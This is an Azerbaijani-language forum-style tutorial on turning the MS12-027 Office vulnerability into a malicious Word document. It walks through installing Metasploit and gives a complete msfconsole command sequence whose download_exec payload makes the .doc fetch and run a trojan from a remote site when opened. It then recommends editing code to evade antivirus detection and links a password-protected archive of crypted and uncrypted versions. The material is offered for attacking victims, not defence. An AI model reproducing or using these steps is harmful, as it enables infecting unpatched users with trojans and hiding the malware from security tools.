Ətraflı buradan oxuya bilərsiz
http://technet.microsoft.com/tr-tr/security/bulletin/ms12-027 türkcə
http://technet.microsoft.com/ru-ru/security/bulletin/ms12-027 rusca
Qısaca deyim ki bu çox təhlükəli bir exploitdir. Bunun vasitəsilə .doc uzantılı fayldan downloader etmək olur
Yəniki hər kimsə bu .doc (Microsoft Word) uzantılı faylı açsa onda bizim indi qeyd edəcəyimiz troy kompa yüklenib və sonra run olacaq
Bu 2003 və 2007 versiyaları üçün aktualdı, (əgər update olunmayıbsa )
Faylımızı compile etmək üçün əvvəlcə Metasploit Version 4.5.3 for Linux 32-Bit yükləyək http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
Mən lunix versiyasını ona görə götürdümkü məndə windowsda nəsə install etmək alınmadı
Mən yükləmə qaydasını lunix üçün göstərəcəm
Kod:
sudo /home/stealth/metasploit-latest-linux-installer.run
sudo Metasploiti admin hüquqları ilə install edir
installdan sonra terminalı açırıq və bu komandanı veririk
Kod:
sudo msfconsole
use exploit/windows/fileformat/ms12_027_mscomctl_bof
set PAYLOAD windows/download_exec
set URL http://site.az/html/TROJ.exe
set FILENAME TROJ.doc
set EXE update.exe
exploit
yuxarıda qeyd etdiyim qovluğu açıb oradakı troi.doc faylını götürürük
user bu faylı açan kimi http://site.az/html/TROJ.exe dakı troyan kompa yüklənir və sonra run olunur
düzdür aldığımız fayl demək olarki bütün av tərəfindən tutulur , ancaq koda bir az əl gəzdirdikdən sonra görəcəksinizki axırda demək olarkı bir fud olur
bir az "zibil" kodda dəyişiklik etsəz avlərdən gizlədə bilərsiz
bu arxivdə cryptdən əvvəl və cryptdən sonra olan versiyalar var
yükləyin və source koda baxın özüvüz iki kodu müqaisə edib görəcəksiniz fərqi
http://ge.tt/9OtRD0e/v/0?c
http://www.boxca.com/79uaa315yw6e/EXPLOIT.rar.html
pass ergenekon